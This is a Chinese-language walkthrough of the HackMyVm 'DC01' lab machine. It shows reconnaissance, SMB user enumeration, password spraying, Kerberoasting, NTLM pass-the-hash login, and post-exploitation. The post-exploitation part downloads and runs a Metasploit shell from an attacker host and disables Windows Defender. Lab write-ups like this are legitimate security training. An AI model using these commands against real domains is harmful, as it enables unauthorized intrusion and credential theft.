HackMyVm-DC01 ：简单-泷羽Sec

10.1 信息打点

nmap -sS 192.168.53.26 -p- -T4 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'

图片[1]-HackMyVm-DC01 ：简单-泷羽Sec

漏洞扫描

nmap -sS 192.168.53.26 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49707,49783 -T4 --script=vuln

图片[2]-HackMyVm-DC01 ：简单-泷羽Sec

使用新版enum4linux枚举系统的全部信息

enum4linux-ng -A 192.168.53.26 -C

图片[3]-HackMyVm-DC01 ：简单-泷羽Sec

10.2 SMB无密登录

列出来smb共享文件夹

图片[4]-HackMyVm-DC01 ：简单-泷羽Sec

可以匿名登录的共享目录中都没有文件，只能继续信息收集

图片[5]-HackMyVm-DC01 ：简单-泷羽Sec

从上面enum4linux-ng枚举结果显示除了SMB服务，还有LDAP以及LDAPS（加密传输，类似于https）服务可达，运行在389/636端口

LDAP 是域内 “用户 / 组 / 计算机信息的数据库”，后续有账号就能查域内核心信息（如用户列表、管理员组）。

图片[6]-HackMyVm-DC01 ：简单-泷羽Sec

Appears to be root/parent DC：目标可能是”主域控制器“，也就是域控，完整的域名为：SOUPEDECODE.LOCAL

域控制器（DC）是域的 “核心”，存储所有域信息（账号、权限、计算机），拿下它就等于控制整个域

后续 LDAP 查询（如 ldapsearch）要写 -b "dc=SOUPEDECODE,dc=LOCAL"，Kerberos 攻击要指定 -d SOUPEDECODE.LOCAL，没有这个域名，大部分域操作都无法执行。

图片[7]-HackMyVm-DC01 ：简单-泷羽Sec

域的 “短域名” 是 SOUPEDECODE（完整域名是 SOUPEDECODE.LOCAL，短域名是简化版）

后续登录域账号时可用短域名（如 SOUPEDECODE\admin）或完整域名（如 admin@SOUPEDECODE.LOCAL），两种格式都支持，短域名更简洁。

其中- SOUPEDECODE <1c> - B Domain Controllers代表着 DC01 属于 “域控制器组”，进一步验证它是域控制器，不是普通域内主机。

刚刚提到了，使用LDAP查询（如ldapsearch）需要增加一个参数 -b，Kerberos 攻击要指定 -d SOUPEDECODE.LOCAL

10.3 ldapsearch

那么利用ldapsearch的完整命令就如下

ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b "dc=SOUPEDECODE,dc=LOCAL" -s base "(objectclass=user)"

图片[8]-HackMyVm-DC01 ：简单-泷羽Sec

上面的代码是什么意思呢？其核心”匿名访问被拒绝“

各个参数解释如下

连接 192.168.53.26 这台 LDAP 服务器（域控制器）；
用 匿名方式 访问（-D '' -w '' 表示空用户名、空密码）；
查询 dc=SOUPEDECODE,dc=LOCAL 这个节点（域的核心数据节点，存储用户、组等信息）；
只查该节点本身（-s base），且只找 “用户类型” 的对象（(objectclass=user)）。

为什么报错了？

text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c

翻译过来是：“要执行这个操作，必须先在连接上完成‘成功的绑定’（即提供有效的账号密码进行身份验证）”

我们想访问的 dc=SOUPEDECODE,dc=LOCAL 节点是域的 “敏感数据区”（存着用户账号、权限等核心信息），域控制器为了安全，禁止匿名用户访问这个区域，必须用 “合法的域账号” 登录后才能查询。

如果不加这个-b参数呢，把它去掉，这样就成功了

ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b '' -s base "(objectclass=user)"

图片[9]-HackMyVm-DC01 ：简单-泷羽Sec

这段 ldapsearch 结果包含了 域控制器（192.168.53.26）的核心架构信息

我们之前执行的命令指定 -b "dc=SOUPEDECODE,dc=LOCAL"，默认查的是 LDAP 的 “根节点”（-b ""）：

根节点只存域的基础架构信息（如域名、支持的协议），不包含敏感数据，所以允许匿名访问，命令能成功；
而之前指定的 dc=SOUPEDECODE,dc=LOCAL 是 “核心数据节点”，匿名访问被拒绝，所以报错。

这次查询返回的是 LDAP 根节点的配置信息，本质是域控制器 “公开可见的基础架构数据”，包含 5 类关键内容：

域的命名结构（域名、目录节点路径）；
域功能级别（操作系统版本版本）；
支持的协议和认证机制；
域控制器的身份标识标识（主机名、角色）；
LDAP 服务的配置限制（如最大连接数、查询超时）。

10.4 匿名枚举用户的SID

解释那么多，渗透到目前收集到的信息，本质就是没有账号密码，获取账号密码可以利用lookupsid

find / -name lookupsid* 2>/dev/null

图片[10]-HackMyVm-DC01 ：简单-泷羽Sec

lookupsid.py 是 Impacket 工具集中的 SID 枚举工具，核心作用是通过 SMB/LDAP 协议查询目标系统的 安全标识符（SID）及其对应账号 / 组信息，在域渗透中常用于 “匿名 / 低权限枚举域内关键账号（如管理员）”，下面枚举soupedecode.local这个域的SID信息，并使用匿名账号和空密码（-no-pass）登录（部分域会禁用匿名登录，这里是一个突破点）

python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/anonymous@192.168.53.26 -no-pass

图片[11]-HackMyVm-DC01 ：简单-泷羽Sec

为什么能列举出来SID？

lookupsid.py，通过匿名访问这个域（工具连接域控制器后，会先查询 “域本身的 SID”），通过枚举rid（sid最后一部分），再拼接完整的sid，工具把每个 “完整 SID” 发给域控制器，调用它的 LsaLookupSids2 接口（就像查字典），问：“这个 SID 对应哪个账号？”，这样工具就会返回给你对应的账号信息

# 筛选 SidTypeUser 行 → 提取账号名（去掉 SOUPEDECODE\） → 去重 → 保存到 target_users.txt，AI一下就行
grep "SidTypeUser" /data/demo/user | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt

图片[12]-HackMyVm-DC01 ：简单-泷羽Sec

10.5 nxc内网渗透

nxc内网渗透神器，进行SMB爆破，但是这里我们是用户和密码都不知道，相当于burpsuite中的集群炸弹攻击，为了减少攻击次数，我们可以使用相同的账号密码，进行攻击，也就是burpsuite中的Pitchfork攻击

图片[13]-HackMyVm-DC01 ：简单-泷羽Sec

所以命令如下

nxc smb 192.168.53.26 -u target_users.txt -p target_users.txt --no-bruteforce --continue-on-success

图片[14]-HackMyVm-DC01 ：简单-泷羽Sec

找到ybob317:ybob317账号密码，继续接下来的渗透，smb登录，照样也没有任何东西

图片[15]-HackMyVm-DC01 ：简单-泷羽Sec

换一个USERS，这里面有东西，我们去看看，全部下载下来

图片[16]-HackMyVm-DC01 ：简单-泷羽Sec

尝试上传一个文件shell，禁止上传

图片[17]-HackMyVm-DC01 ：简单-泷羽Sec

将全部的文件都下载下来

recurse ON
prompt OFF
mget *

图片[18]-HackMyVm-DC01 ：简单-泷羽Sec

在ybob317中找到了flag

图片[19]-HackMyVm-DC01 ：简单-泷羽Sec

10.6 kerberos攻击

服务器上开启了kerberos服务

图片[20]-HackMyVm-DC01 ：简单-泷羽Sec

如果目标是 域控制器（DC）（如你之前枚举的 DC01.SOUPEDECODE.LOCAL），则 一定开启了 Kerberos 服务，因为：

1、Kerberos 是 Windows 域环境的核心认证协议，用于域内账号登录、服务访问等身份验证；

2、域控制器作为 Kerberos 的 “密钥分发中心（KDC）”，必须运行 Kerberos 服务（kdc.exe 进程），否则域功能无法正常工作。

impacket-GetUserSPNs -request -dc-ip 192.168.53.26 SOUPEDECODE.LOCAL/ybob317:ybob317

通过域用户 ybob317 的凭证，向域控制器（IP：192.168.53.26）查询域内所有关联了 SPN 的用户，并强制请求并获取这些用户的 TGS 票据（Ticket-Granting Service），最终可用于破解用户密码（利用 hashcat 等工具爆破 TGS 票据哈希）。

图片[21]-HackMyVm-DC01 ：简单-泷羽Sec

同步时间

ntpdate 192.168.53.26

图片[22]-HackMyVm-DC01 ：简单-泷羽Sec

将这些内容全部复制到一个名叫”hash“文件中，使用hashcat攻击，爆破出来file_svc用户的密码为Password123!!

hashcat -a 0 -m 13100 hash /usr/share/wordlists/rockyou.txt

图片[23]-HackMyVm-DC01 ：简单-泷羽Sec

使用smbclient登录

smbclient //192.168.53.26/backup -U file_svc
Password123!!
get backup_extract.txt
exit

图片[24]-HackMyVm-DC01 ：简单-泷羽Sec

随后使用awk进行筛选

awk -F '[:]' '{print $4}' backup_extract.txt > ntml.txt

图片[25]-HackMyVm-DC01 ：简单-泷羽Sec

nxc smb 192.168.53.26 -u target_users.txt -H ntml.txt

最终账号密码如下

FileServer$ ：e41da7e79a4c76dbd9cf79d1cb325559

图片[26]-HackMyVm-DC01 ：简单-泷羽Sec

10.7 远程连接

evil-winrm -i 192.168.53.26 -u "FileServer$" -H "e41da7e79a4c76dbd9cf79d1cb325559"

图片[27]-HackMyVm-DC01 ：简单-泷羽Sec

至此已经拿到了管理员权限，和最后的flag，据说在域中administrator就是系统权限

10.8 获取system权限

后续如果有兴趣的是否可以利用这个管理员权限提升至系统权限，默认的cmd下载命令不能用，只能用powershell，命令如下

Invoke-WebRequest -Uri "http://192.168.53.141:8000/PrivescCheck.ps1" -OutFile "PrivescCheck.ps1"

Set-ExecutionPolicy Bypass -Scope process -Force
./PrivescCheck.ps1 # 或者. .\PrivescCheck.ps1
Invoke-PrivescCheck

Set-MpPreference -DisableRealtimeMonitoring $true # 关闭杀软

Invoke-WebRequest -Uri "http://192.168.53.141:8000/shell.exe" -OutFile "shell.exe"
./shell.exe # msf生成的马

可以看到是能正常上线的

图片[28]-HackMyVm-DC01 ：简单-泷羽Sec

扫描出来两个提权漏洞，第二个不能用

图片[29]-HackMyVm-DC01 ：简单-泷羽Sec

可以使用第一个，但是没有创建成功会话，由于桥接模式老是自动换ip，就不继续了，另外使用mimikatz.exe也不能正常执行，x86和x64都试过了，后续有做出来的师傅，欢迎添加我好友，一起讨论 + baibaixiaoyu2024

exploit/windows/local/ms16_032_secondary_logon_handle_privesc

图片[30]-HackMyVm-DC01 ：简单-泷羽Sec

往期推荐

全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细

HackMyVm-TriplAdvisor ：简单

新版BurpSuite v2025.6.3汉化版，附激活教程

Fine！2025最新款信息收集综合工具

若依Vue漏洞检测工具v7更新

最好用的下一代目录爆破工具，全方位的目录爆破

集成MemProcFS，Vol2和Vol3的内存取证神器

重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器

x-waf，一个基于fuzz的waf绕过渗透工具

这10款内网穿透工具，一定有你没用过的

红队命令速查手册

挖SRC必须知道的25个漏洞提交平台

FeatherScan v4.0 – 一款Linux内网全自动信息收集工具

掩日-适用于红队的综合免杀工具

2025最新渗透测试靶场推荐

近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等

【内网渗透】隐藏通信隧道技术

内网渗透必备，microsocks，一个轻量级的socks代理工具

神器分享红队快速打点工具-DarKnuclei

红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路

【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏

【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！

一个永久的渗透知识库

【oscp】vulnerable_docker，三种代理方法打入内网

【内网渗透】CobaltStrike与MSF联动互相上线的方式

内网渗透必备，microsocks，一个轻量级的socks代理工具

【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！

DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程

【渗透测试】12种rbash逃逸方式总结

红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路

红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学

不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学

ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略

sql注入中各种waf的绕过方式，狗，盾，神，锁，宝

利用MySQL特性，WAF绕过技巧

SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细

大型翻车现场，十种waf绕过姿势，仅成功一种

喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

本站内容部分转载于互联网，并不代表本站立场！如若本站内容侵犯了原著者的合法权益，可联系我们进行处理！拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论！

THE END

OSCP打靶泷羽收录
# Windows渗透 # HackMyVm # 域渗透